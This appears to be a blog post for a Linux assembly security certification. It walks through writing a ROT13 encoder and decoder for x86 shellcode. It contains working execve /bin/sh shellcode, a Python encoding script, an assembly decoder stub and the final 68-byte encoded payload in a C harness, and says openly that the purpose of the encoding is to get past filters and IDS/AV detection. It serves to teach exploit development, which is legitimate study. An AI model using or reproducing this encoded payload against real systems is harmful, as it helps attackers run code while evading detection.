SLAE #4: Custom Encoder

The fourth SLAE assignment consists in writing a custom shellcode encoder.

Encoding the shellcode can serve for various purposes. It can be used to bypass certain filters, get rid of bad characters, transform the shellcode into pure alphanumeric, etc.

It can also be used to avoid IDS or AV detection. However, most well known encoders are fingerprinted and detected by modern products.

I’ll write a ROT13 encoder/decoder to complete this assignment. ROT13 is a simple substitution cipher that replaces each letter with the letter that is 13 positions away in the alphabet. Once the end of the alphabet is reached, the algorithm wraps around and starts from the beginning of the alphabet again.

ROT13 is a super weak cipher and shouldn’t be used for anything serious.

The alphabet in this case is not only A-Z letters, but the full 0x00-0xFF range to cover all possible opcodes.

The shellcode to be encoded is a simple execve that spawns a shell.

global _start           

section .text

_start:
    xor eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80

Next step is to assemble, link, and extract the opcodes.

$ nasm -f elf32 -o execve-shell-stack.o execve-shell-stack.nasm
$ ld -z execstack -o execve-shell-stack execve-shell-stack.o 
$ objdump -d ./execve-shell-stack|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

We can write a simple python script that encodes a given shellcode using ROT13 and prints the encoded output. The script will also print a nasm-friendly formatted shellcode that can be used directly in the nasm file.

Note that the n value can be changed to use any other ROT-n encoding scheme, since the algorithm stays the same.

#!/usr/bin/env python

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
             "\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

n = 13 # rot-n
max_value_without_wrapping = 256 - n

encoded_shellcode = ""
db_shellcode = []

for x in bytearray(shellcode):
    if x < max_value_without_wrapping:
        encoded_shellcode += '\\x%02x' % (x + n)
        db_shellcode.append('0x%02x' % (x + n))
    else:
        encoded_shellcode += '\\x%02x' % (n - 256 + x)
        db_shellcode.append('0x%02x' % (n - 256 + x))

print "Encoded shellcode:\n%s\n" % encoded_shellcode

print "DB formatted (paste in .nasm file):\n%s\n" % ','.join(db_shellcode)

ROT13 just rotates the values, so the encoded version has the same length as the original shellcode.

$ python rot13-encoder.py 
Encoded shellcode:
\x3e\xcd\x5d\x75\x3c\x3c\x80\x75\x75\x3c\x6f\x76\x7b\x96\xf0\x5d\x96\xef\x60\x96\xee\xbd\x18\xda\x8d

DB formatted (paste in .nasm file):
0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d

Now it’s time to write the decoder in assembly. The program will use the JMP-CALL-POP technique to get the address of the encoded shellcode, decode it, and execute it.

global _start           

section .text

_start:
    jmp short call_decoder

decoder:
    pop esi                     ; shellcode address
    xor ecx, ecx                ; zero out ecx
    mov cl, len                 ; initialize counter

decode:
    cmp byte [esi], 0xD         ; can we substract 13?
    jl wrap_around              ; nope, we need to wrap around
    sub byte [esi], 0xD         ; substract 13
    jmp short process_shellcode ; process the rest of the shellcode

wrap_around:
    xor edx, edx                ; zero out edx
    mov dl, 0xD                 ; edx = 13
    sub dl, byte [esi]          ; 13 - shellcode byte value
    xor ebx,ebx                 ; zero out ebx
    mov bl, 0xff                ; store 0x100 without introducing null bytes
    inc ebx
    sub bx, dx                  ; 256 - (13 - shellcode byte value)
    mov byte [esi], bl          ; write decoded value

process_shellcode:
    inc esi                     ; move to the next byte
    loop decode                 ; decode current byte
    jmp short shellcode         ; execute decoded shellcode

call_decoder:
    call decoder
    shellcode: 
        db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b
        db 0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d
    len: equ $-shellcode

Since the program writes to the .text segment, it needs to be linked using the -N flag.

$ nasm -f elf32 -o rot13-decoder.o rot13-decoder.nasm
$ ld —help | grep .text
  -N, —omagic                Do not page align data, do not make text readonly
[…]
$ ld -z execstack -N -o rot13-decoder rot13-decoder.o 

A quick inspection with objdump -M intel -d rot13-decoder shows that there are no null bytes.

The final shellcode is 68 bytes long. It contains the decoder stub prepended to the encoded shell spawning shellcode.

#include <stdio.h>
#include <string.h>

unsigned char code[] =
// Decoder stub:
"\xeb\x24\x5e\x31\xc9\xb1\x19\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x10\x31\xd2"
"\xb2\x0d\x2a\x16\x31\xdb\xb3\xff\x43\x66\x29\xd3\x88\x1e\x46\xe2\xe3\xeb\x05"
"\xe8\xd7\xff\xff\xff"
// Encoded shellcode:
"\x3e\xcd\x5d\x75\x3c\x3c\x80\x75\x75\x3c\x6f\x76\x7b\x96\xf0\x5d\x96\xef\x60"
"\x96\xee\xbd\x18\xda\x8d";

int main(void) {
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}

Keep in mind that this code needs to be compiled with an executable stack.

$ gcc -o shellcode shellcode.c -z execstack

You can find the code for this assignment on my Github repository.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-­651

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s